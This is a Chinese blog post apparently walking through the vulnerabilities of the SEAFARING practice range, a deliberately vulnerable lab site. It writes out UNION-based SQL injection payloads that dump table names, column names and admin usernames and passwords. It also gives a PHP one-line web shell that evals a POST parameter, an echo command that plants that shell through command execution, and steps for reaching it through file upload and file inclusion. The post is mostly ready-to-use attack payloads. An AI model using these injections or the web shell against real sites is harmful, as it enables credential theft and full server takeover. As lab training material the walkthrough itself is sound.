当前位置: 首页 > article >正文

SEAFARING靶场漏洞攻略

article 2024/11/16 18:53:07

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接


http://www.kler.cn/a/303597.html

相关文章:

  • 第9章 DIV+CSS布局
  • ElementUI的日期组件中禁止选择小时、分钟、秒
  • 本地 / 网络多绑定用例总结
  • 基于SpringBoot+RabbitMQ完成应⽤通信
  • vue3: ref, reactive, readonly, shallowReactive
  • 微信小程序——01开发前的准备和开发工具
  • AnyGPT:多模态语言模型,任意处理语音、图像和音乐
  • 【深度学习】【图像分类】【OnnxRuntime】【Python】VggNet模型部署
  • 项目进度一
  • 数据库常规操作
  • vue引入三维模型
  • 【绿盟科技盟管家-注册/登录安全分析报告】
  • 2024CCPC网络预选赛
  • raksmart大带宽服务器租用
  • mycat双主高可用架构部署-MySQL5.7环境部署第一台
  • 「漏洞复现」紫光电子档案管理系统 selectFileRemote SQL注入漏洞
  • TestCraft - GPT支持的测试想法生成器和自动化测试生成器
  • 前端使用COS上传文件
  • 为什么要进行MySQL增量备份?
  • 【数据结构和算法实践-树-LeetCode112-路径总和】
  • 力扣: 四数相加II
  • Linux安装管理多版本JDK
  • CSS Clip-Path:重塑元素边界的艺术
  • mysql慢sql问题修复
  • 计算机毕业设计 自习室座位预约系统的设计与实现 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试
  • qt操作excel(QAxObject详细介绍)